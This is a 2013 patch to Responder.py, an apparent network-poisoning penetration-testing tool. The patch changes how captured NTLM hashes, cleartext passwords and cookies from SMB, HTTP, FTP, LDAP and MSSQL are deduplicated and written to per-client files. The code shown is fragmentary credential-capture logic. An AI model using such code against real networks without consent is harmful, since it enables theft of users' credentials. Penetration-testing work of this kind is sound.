From 69c08995e5345d702a0360f80dad7cddd26d8ea0 Mon Sep 17 00:00:00 2001 From: Lgandx Date: Thu, 28 Feb 2013 12:04:53 -0500 Subject: [PATCH] Responder now insert multiple usernames/hashes in a file for the same hostname. --- Responder.py | 56 ++++++++++++++++++++++++++++++++-------------------- 1 file changed, 35 insertions(+), 21 deletions(-) diff --git a/Responder.py b/Responder.py index 182544c..0ed5e23 100644 --- a/Responder.py +++ b/Responder.py @@ -20,7 +20,7 @@ import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os from Fingerprint import RunSmbFinger,OsNameClientVersion from odict import OrderedDict from socket import inet_aton -from random import randrange +from random import randrange, choice parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b 1 -s On -r 0', prog=sys.argv[0], @@ -91,11 +91,22 @@ def Show_Help(ExtraHelpData): print help #Function used to write captured hashs to a file. -def WriteData(outfile,data): - with open(outfile,"w") as outf: - outf.write(data) - outf.write("\n") - outf.close() +def WriteData(outfile,data, user): + if os.path.isfile(outfile) == False: + with open(outfile,"w") as outf: + outf.write(data) + outf.write("\n") + outf.close() + if os.path.isfile(outfile) == True: + with open(outfile,"r") as filestr: + if re.search(user, filestr.read()): + filestr.close() + return None + else: + with open(outfile,"a") as outf2: + outf2.write(data) + outf2.write("\n") + outf2.close() # Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident. Challenge = "" @@ -330,7 +341,7 @@ def ParseSMBHash(data,client): User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal - WriteData(outfile,writehash) + WriteData(outfile,writehash,User+"::"+Domain) print "[+]SMB complete hash is :", writehash logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) @@ -347,7 +358,7 @@ def ParseSMBHash(data,client): User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:] - WriteData(outfile,writehash) + WriteData(outfile,writehash,User+"::"+Domain) print "[+]SMB complete hash is :", writehash logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(writehash)) @@ -367,7 +378,7 @@ def ParseLMNTHash(data,client): var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() - WriteData(outfile,Writehash) + WriteData(outfile,Writehash, Username+"::"+Domain) print "[+]SMB-NTLMv2 complete hash is :",Writehash logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash)) print "Username : ",Username @@ -382,7 +393,7 @@ def ParseLMNTHash(data,client): var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal - WriteData(outfile,writehash) + WriteData(outfile,writehash, Username+"::"+Domain) print "[+]SMB complete hash is :", writehash logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) print "Username : ",Username @@ -589,7 +600,7 @@ def ParseSQLHash(data,client): print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') logging.warning('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) outfile = "MSSQL-NTLMv1-Client-"+client+".txt" - WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal) + WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain) print '[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal) logging.warning('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) if NthashLen > 60: @@ -610,7 +621,7 @@ def ParseSQLHash(data,client): logging.warning('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) outfile = "MSSQL-NTLMv2-Client-"+client+".txt" Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper() - WriteData(outfile,Writehash) + WriteData(outfile,Writehash,User+"::"+Domain) print "[+]MSSQL NTLMv2 Complete Hash is : ", Writehash logging.warning('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash)) @@ -810,7 +821,7 @@ def ParseHTTPHash(data,client): logging.warning('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) outfile = "HTTP-NTLMv1-Client-"+client+".txt" WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal - WriteData(outfile,WriteHash) + WriteData(outfile,WriteHash, User+"::"+Hostname) print "Complete hash is : ", WriteHash logging.warning('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash)) if NthashLen > 24: @@ -834,7 +845,7 @@ def ParseHTTPHash(data,client): logging.warning('[+]HTTP NTLMv2 Hostname is :%s'%(HostName)) outfile = "HTTP-NTLMv2-Client-"+client+".txt" WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:] - WriteData(outfile,WriteHash) + WriteData(outfile,WriteHash, User+"::"+Domain) print "Complete hash is : ", WriteHash logging.warning('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) @@ -898,9 +909,11 @@ def PacketSequence(data,client): if b: GrabCookie(data,client) outfile = "HTTP-Clear-Text-Password-"+client+".txt" - WriteData(outfile,b64decode(''.join(b))) + WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b))) print "[+]HTTP-User & Password:", b64decode(''.join(b)) logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b)))) + buffer1 = str(IIS_Auth_Granted()) + return buffer1 else: return str(Basic_Ntlm(Basic)) @@ -978,10 +991,10 @@ def ParseDomain(data,client): DomainName = re.search('^(.*:)//([a-z\-.]+)(:[0-9]+)?(.*)$', Host) if DomainName: OutFile = "HTTPCookies/HTTP-Cookie-"+DomainName.group(2)+"-"+client+".txt" - WriteData(OutFile,Message) + WriteData(OutFile,Message, Message) else: OutFile = "HTTPCookies/HTTP-Cookie-"+Host.replace('/','')+"-"+client+".txt" - WriteData(OutFile,Message) + WriteData(OutFile,Message, Message) #Handle HTTP packet sequence. def ProxyPacketSequence(data,client): @@ -1004,7 +1017,7 @@ def ProxyPacketSequence(data,client): return str(buffer1) if b: outfile = "HTTP-Proxy-Clear-Text-Password-"+client+".txt" - WriteData(outfile,b64decode(''.join(b))) + WriteData(outfile,b64decode(''.join(b)),b64decode(''.join(b))) print "[+][Proxy]HTTP-User & Password:", b64decode(''.join(b)) logging.warning('[+][Proxy]HTTP-User & Password: %s'%(b64decode(''.join(b)))) buffer1 = DitchThisConnection() @@ -1066,7 +1079,7 @@ class FTP(SocketServer.BaseRequestHandler): if data[0:4] == "PASS": Pass = data[5:].replace("\r\n","") Outfile = "FTP-Clear-Text-Password-"+self.client_address[0]+".txt" - WriteData(Outfile,User+":"+Pass) + WriteData(Outfile,User+":"+Pass, User+":"+Pass) print "[+]FTP Password is: ", Pass logging.warning('[+]FTP Password is: %s'%(Pass)) t = FTPPacket(Code="530",Message="User not logged in.") @@ -1112,7 +1125,7 @@ def ParseLDAPHash(data,client): User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','') writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal Outfile = "LDAP-NTLMv1-"+client+".txt" - WriteData(Outfile,writehash) + WriteData(Outfile,writehash,User+"::"+Domain) print "[LDAP] NTLMv1 complete hash is :", writehash logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash)) if LMhashLen <2 : @@ -1147,7 +1160,7 @@ def ParseLDAPPacket(data,client): Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen] print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password outfile = "LDAP-Clear-Text-Password-"+client+".txt" - WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password)) + WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password)) logging.warning('[LDAP]User: %s Password: %s'%(UserDomain,Password)) if sasl == "\xA3": buff = ParseNTLM(data,client) @@ -1169,6 +1182,7 @@ class LDAP(SocketServer.BaseRequestHandler): def handle(self): try: while True: + self.request.settimeout(0.5) data = self.request.recv(8092) buffer0 = ParseLDAPPacket(data,self.client_address[0]) if buffer0: